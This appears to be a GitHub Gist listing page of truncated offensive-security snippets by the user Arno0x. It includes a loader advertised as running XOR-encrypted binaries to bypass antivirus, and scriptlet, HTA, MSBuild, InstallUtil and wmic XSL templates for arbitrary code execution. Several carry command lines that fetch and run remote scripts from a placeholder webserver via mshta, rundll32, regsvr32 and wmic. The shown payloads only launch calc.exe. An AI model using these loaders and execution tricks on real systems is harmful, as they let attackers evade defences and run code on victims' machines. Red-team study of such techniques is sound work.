Arno0x
Arno0x
/ NetLoader.cs
Last active
April 3, 2025 08:57
Partial rewrite of @Flangvik NetLoader. Supports proxy with authentication, XOR encrypted binaries, multiple arguments passing to binary.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Arno0x0x, Twitter: @Arno0x0x | |
| Completely based on @Flangvik netloader | |
| This partial rewrite of @Flangvik Netloader includes the following changes: | |
| - Allow loading of an XOR encrypted binary to bypass antiviruses | |
| To encrypt the initial binary you can use my Python transformFile.py script. | |
| Example: ./transformFile.py -e xor -k mightyduck -i Rubeus.bin -o Rubeus.xor | |
Arno0x
/ TestAssembly.cs
Last active
March 22, 2025 07:45
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| ================================ Compile as a .Net DLL ============================== | |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs | |
| */ | |
| using System.Windows.Forms; | |
| namespace TestNamespace |
Arno0x
/ transformFile.py
Last active
December 22, 2024 04:13
Performs multiple useful transformation on files
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding: utf8 -*- | |
| # | |
| # Author: Arno0x0x, Twitter: @Arno0x0x | |
| # | |
| import argparse | |
| from Crypto.Cipher import AES | |
| import pyscrypt | |
| from base64 import b64encode |
Arno0x
/ scriptlet.sct
Created
November 17, 2017 16:49
Scriplet that can be executed by mshta or rundll32 for arbitrary code execution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); --> | |
| <!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --> | |
| <scriptlet> | |
| <public> | |
| </public> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); |
Arno0x
/ installUtil.cs
Created
September 26, 2017 11:51
Example of a C# DLL to be used with the InstallUtil utility to make it execute some arbitrary code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Arno0x0x, Twitter: @Arno0x0x | |
| ===================================== COMPILING ===================================== | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /unsafe /out:installUtil.dll installUtil.cs | |
| ===================================== USAGE ===================================== | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logtoconsole=false /logfile= /u installUtil.dll | |
| */ |
Arno0x
/ regsvr32.sct
Created
November 17, 2017 16:52
A scriptlet that can be executed by regsvr32.exe for arbitrary code execution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll --> | |
| <!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll --> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{10001111-0000-0000-0000-0000FEEDACDC}" > | |
| <script language="JScript"> | |
| <![CDATA[ | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <HTA:APPLICATION ID="HelloExample"> | |
| <script language="jscript"> | |
| var c = "cmd.exe /c calc.exe"; | |
| new ActiveXObject('WScript.Shell').Run(c); | |
| </script> | |
| </head> | |
| <body> | |
| <script>self.close();</script> |
Arno0x
/ msbuild.xml
Created
November 17, 2017 17:04
MSBuild project definition to execute arbitrary code from msbuild.exe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml --> | |
| <Target Name="Hello"> | |
| <SharpLauncher > | |
| </SharpLauncher> | |
| </Target> | |
| <UsingTask | |
| TaskName="SharpLauncher" | |
| TaskFactory="CodeTaskFactory" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0'?> | |
| <!-- Discovered by @SubTee and @mattifestation --> | |
| <!-- Execute with: wmic os get /format:"https://webserver/wmic.xsl" --> | |
| <stylesheet | |
| xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
| xmlns:user="placeholder" | |
| version="1.0"> | |
| <output method="text"/> | |
| <ms:script implements-prefix="user" language="JScript"> | |
| <![CDATA[ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re, json | |
| from math import log2 | |
| import getpass | |
| import requests, zipfile, io | |
| import os, datetime | |
| import hashlib | |
| from collections import Counter | |
| from functools import reduce | |
| #================================================================= |
NewerOlder